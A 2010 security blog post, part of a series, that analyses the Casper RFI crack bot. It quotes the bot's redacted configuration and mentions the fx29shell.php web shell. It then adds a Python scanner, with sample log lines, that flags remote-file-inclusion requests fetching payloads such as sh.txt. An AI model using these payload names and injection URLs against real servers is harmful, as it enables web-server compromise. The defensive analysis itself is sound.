Irregular Expressions

Aug 22 2010   9:44PM GMT

Casper RFI crack bot – Part 5

Dan O'Connor

Some of the sh.txt script seems to be pretty old: it calls milw0rm and darkc0de, both of which are no longer up and have not been for a while.

There are also a few things worth looking into here. The script mentions fx29shell.php, which is a PHP shell that can be loaded onto the system.

It can do all kinds of nasty things to your web server; you can download /etc/passwd for a start. That is not good if you find this on your system, so it might be a good time to run some Google searches against your domain (while we are talking about it).

So after all of this it looks like casper.(pl|txt) is the main thing doing all of the work, as you can tell from all of the variables.

$admin       = "XXXXX";
$serverircs  = array("irc.xxxxx.xxx");
$serverirc   = $serverircs[rand(0,count($serverircs) - 1)];
$urldata     = "http://xxxxxxx/xxxxxxx/casper/";
$injektor    = "sh.txt";
$defacer     = "def.txt";
$filepsy     = "psy.tar.gz";
$portpsy     = "6667";
$fileggdrop  = "eggdrop.tar.gz";
$filebotphp  = "bot.txt";
$crbots      = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";
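
One way to use the file names above when reviewing your own web server access logs (an added example, not code from the original post or from the bot; the log lines are constructed, use documentation addresses, and assume the Apache combined log format):

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# File names from the post: the shell it mentions plus the payload names in the
# casper variable list. Everything else here is an assumption of this example.
KNOWN_NAMES = {
    "fx29shell.php", "sh.txt", "def.txt", "psy.tar.gz", "eggdrop.tar.gz",
    "bot.txt", "iso.txt", "scan.txt",
}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Aug/2010:21:40:01 +0000] "GET /index.php?page=http://192.0.2.10/casper/sh.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Aug/2010:21:40:05 +0000] "GET /index.php?inc=http%3A%2F%2F192.0.2.10%2Fcasper%2Fbot.txt%3F HTTP/1.1" 404 210',
    '203.0.113.9 - - [22/Aug/2010:21:41:00 +0000] "GET /images/fx29shell.php HTTP/1.1" 200 9000',
    '203.0.113.20 - - [22/Aug/2010:21:42:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024',
    '203.0.113.21 - - [22/Aug/2010:21:42:30 +0000] "GET /go.php?url=http://example.com/ HTTP/1.1" 302 0',
]

def basename(path):
    """Last path component, lower-cased, ignoring a trailing '?' or '/'."""
    return path.rstrip("?/").rsplit("/", 1)[-1].lower()

def inspect_line(line):
    """Return (client, status, reasons) for a suspicious log line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    reasons = []
    if basename(unquote(parts.path)) == "fx29shell.php":
        reasons.append("request for fx29shell.php")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = value.strip()  # parse_qsl has already percent-decoded it
        if REMOTE_RE.match(value):
            name = basename(urlsplit(value).path)
            tag = "known casper file " + name if name in KNOWN_NAMES else "remote URL"
            reasons.append(f"param {key!r}: {tag}")
    return (client, int(status), reasons) if reasons else None

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = inspect_line(line)
        if hit:
            print(*hit)
```

A plain "remote URL" hit can be a legitimate redirect parameter and needs a manual look; a 200 response to a request for fx29shell.php means the file is actually present on the server.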

In the next section we will take a closer look at casper, now that we have poked around a bit.
